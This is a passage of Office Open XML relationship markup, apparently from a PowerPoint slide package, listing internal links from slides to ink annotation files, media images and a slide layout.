Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink676.xml"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image912.png"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink592.xml"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink596.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image457.png"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink612.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image465.png"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink615.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image490.png"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1211.png"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink623.xml"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink631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644.xml"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink651.xml"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink662.xml"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink646.xml"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1210.png"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink671.xml"/><Relationship Id="rId248" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image861.png"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image940.png"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink684.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink591.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image452.png"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink602.xml"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink607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40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image710.png"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink618.xml"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink626.xml"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2011.png"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2810.png"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink639.xml"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink657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711.png"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink665.xml"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2010.png"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image891.png"/><Relationship Id="rId259" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink679.xml"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image488.png"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink597.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image455.png"/><Relationship Id="rId270" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image970.png"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink608.xml"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink613.xml"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink621.xml"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1511.png"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink634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93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink642.xml"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink647.xml"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink652.xml"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink660.xml"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1510.png"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image841.png"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink674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260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image921.png"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink682.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3410.png"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink598.xml"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink603.xml"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink616.xml"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1011.png"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink629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637.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image339.png"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink655.xml"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1010.png"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1810.png"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink668.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink589.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image458.png"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image871.png"/><Relationship Id="rId255" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink677.xml"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image248.png"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink593.xml"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image392.png"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink609.xml"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image511.png"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink624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632.xml"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3610.png"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink645.xml"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink648.xml"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image512.png"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink663.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image453.png"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1310.png"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2110.png"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink672.xml"/><Relationship Id="rId261" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink680.xml"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image950.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink590.xml"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink604.xml"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image461.png"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink619.xml"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2111.png"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink599.xml"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image811.png"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink627.xml"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2910.png"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink640.xml"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink658.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1100.png"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image810.png"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1610.png"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink666.xml"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink675.xml"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image901.png"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink594.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image456.png"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink614.xml"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1611.png"/><Relationship Id="rId272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink685.xml"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink610.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image464.png"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink622.xml"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2410.png"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink635.xml"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink643.xml"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image480.png"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink653.xml"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3210.png"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink649.xml"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1110.png"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink661.xml"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink669.xml"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image851.png"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink683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27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink605.xml"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image930.png"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink600.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image459.png"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink617.xml"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1111.png"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1911.png"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink630.xml"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink638.xml"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2710.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image410.png"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image611.png"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink656.xml"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1910.png"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink678.xml"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink664.xml"/><Relationship Id="rId252" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image881.png"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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0.xml"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1710.png"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image487.png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33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink706.xml"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image610.png"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1411.png"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink720.xml"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink728.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2310.png"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2211.png"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink736.xml"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3710.png"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3910.png"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink744.xml"/><Relationship Id="rId226" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink755.xml"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image462.png"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1210.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image449.png"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink696.xml"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink701.xml"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image910.png"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink715.xml"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1711.png"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink723.xml"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink731.xml"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3010.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image294.png"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink750.xml"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2010.png"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image711.png"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink758.xml"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink687.xml"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink691.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image457.png"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink707.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image465.png"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink710.xml"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1211.png"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink718.xml"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink726.xml"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2510.png"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3310.png"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink739.xml"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink745.xml"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1510.png"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink741.xml"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink753.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image452.png"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink697.xml"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink702.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image460.png"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image394.png"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink705.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image464.png"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image710.png"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink713.xml"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink717.xml"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink721.xml"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2011.png"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2410.png"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink730.xml"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2810.png"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink734.xml"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink738.xml"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image611.png"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1010.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout6.xml"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3210.png"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink743.xml"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink748.xml"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink752.xml"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1410.png"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1810.png"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink761.xml"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink763.xml"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image488.png"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink692.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image451.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image455.png"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink700.xml"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink695.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image459.png"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink703.xml"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink708.xml"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink712.xml"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1111.png"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink716.xml"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1511.png"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1911.png"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink725.xml"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink729.xml"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink733.xml"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3810.png"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2311.png"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2710.png"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink737.xml"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1100.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image410.png"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image512.png"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink747.xml"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image911.png"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1310.png"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink756.xml"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink760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20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink693.xml"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink698.xml"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink711.xml"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1011.png"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink724.xml"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3110.png"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1811.png"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink732.xml"/><Relationship Id="rId7" 